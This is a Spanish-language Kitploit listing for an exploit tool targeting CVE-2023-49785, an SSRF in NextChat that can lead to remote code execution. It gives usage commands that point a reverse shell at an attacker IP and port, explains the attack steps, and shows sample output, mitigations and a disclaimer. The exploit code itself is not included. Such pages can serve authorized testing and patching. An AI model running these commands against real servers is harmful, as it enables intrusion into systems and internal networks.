Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
NextChat_SSRF_CVE-2023-49785 | Kitploit
Herramientas/GitHubGitHub/hyunnna/nextchat_ssrf_cve-2023-49785
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de Penetración
GitHubhyunnna/nextchat_ssrf_cve-2023-49785

NextChat_SSRF_CVE-2023-49785

Ver Repositorio
hace 7 mesesAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

NextChat_SSRF_CVE-2023-49785

root@kitploit:~
# Exploit para CVE-2023-49785
# NextChat SSRF a RCE
# Uso: python3 exploit.py <objetivo> <tu_ip> <tu_puerto> [--proxy PROXY] [--only-ssrf] [--verbose]

📌 Descripción

Este exploit aprovecha CVE-2023-49785, una vulnerabilidad de Server-Side Request Forgery (SSRF) en NextChat (ChatGPT-Next-Web) que permite a un atacante no autenticado enviar solicitudes HTTP arbitrarias desde el servidor mediante el parámetro icon del punto final /api/chat. Bajo ciertas condiciones, esto puede derivar en ejecución remota de código (RCE) mediante el acceso a servicios internos, cabeceras de metadatos o endpoints de administración.

🚀 Características

  • 🎯 Explotación de SSRF en el punto final /api/chat
  • 🔥 Escalada a RCE mediante acceso a servicios internos
  • 🌐 Soporte para IPv4 e IPv6
  • 🖥️ Modo --only-ssrf para pruebas de validación
  • 🔁 Bypass de restricciones de URL mediante redirecciones
  • 🧪 Incluye payloads de prueba para servicios internos comunes
  • 🔍 Salida detallada con --verbose

📋 Requisitos

root@kitploit:~
pip install requests

🛠️ Uso

Validación básica de SSRF

root@kitploit:~
python3 exploit.py http://objetivo.local 10.10.14.5 4444 --only-ssrf

Explotación completa (SSRF + RCE a través de servicio interno)

root@kitploit:~
python3 exploit.py http://objetivo.local 10.10.14.5 4444 --verbose

Con proxy

root@kitploit:~
python3 exploit.py http://objetivo.local 10.10.14.5 4444 --proxy http://127.0.0.1:8080

Ejemplo con HTTPS

root@kitploit:~
python3 exploit.py https://chat.ejemplo.com 10.10.14.5 4444

⚙️ Parámetros

🧠 Cómo funciona

  1. SSRF: Se inyecta una URL maliciosa en el parámetro icon de la solicitud a /api/chat. El servidor procesa esta URL y realiza la solicitud en nombre del atacante.
  2. Detección de servicios internos: El exploit intenta acceder a servicios internos comunes (p. ej., http://127.0.0.1:8080) para identificar endpoints vulnerables.
  3. RCE: Al llegar a un servicio interno que permita ejecución de comandos (o mediante el abuso de otros endpoints), se lanza un reverse shell hacia tu_ip:tu_puerto.

📄 Ejemplo de salida

root@kitploit:~
$ python3 exploit.py http://chat.ejemplo.com 10.10.14.5 4444 --only-ssrf

[+] Objetivo: http://chat.ejemplo.com
[+] Probando respuesta del objetivo...
[+] El objetivo está activo
[+] Enviando payload SSRF a http://chat.ejemplo.com/api/chat
[+] Estado de la respuesta: 200
[+] Posible SSRF detectado: la respuesta incluye datos del servicio interno.
[+] Prueba completada. El objetivo es vulnerable a SSRF.

🩹 Mitigación

  • Actualizar NextChat a una versión parcheada (>= 2.12.4).
  • No exponer NextChat directamente a Internet sin un proxy inverso que filtre rutas sensibles.
  • Validar y restringir las URL permitidas en el parámetro icon.
  • Segmentar la red para evitar el acceso a servicios internos desde la aplicación.

⚠️ Aviso legal

Este exploit se proporciona únicamente con fines educativos y de pruebas de seguridad autorizadas. El uso indebido de esta herramienta contra sistemas sin permiso explícito puede ser ilegal. El autor no se hace responsable del mal uso de la misma.

📚 Referencias

  • CVE-2023-49785 - NVD
  • NextChat (ChatGPT-Next-Web)
Descargar herramienta
ParámetroDescripción
objetivoURL del NextChat vulnerable (ej. http://chat.ejemplo.com)
tu_ipTu IP para el reverse shell
tu_puertoTu puerto para el reverse shell
--proxy PROXYProxy a utilizar (ej. http://127.0.0.1:8080)
--only-ssrfEjecutar únicamente la validación de SSRF (sin RCE)
--verboseMostrar salida detallada con las respuestas de las solicitudes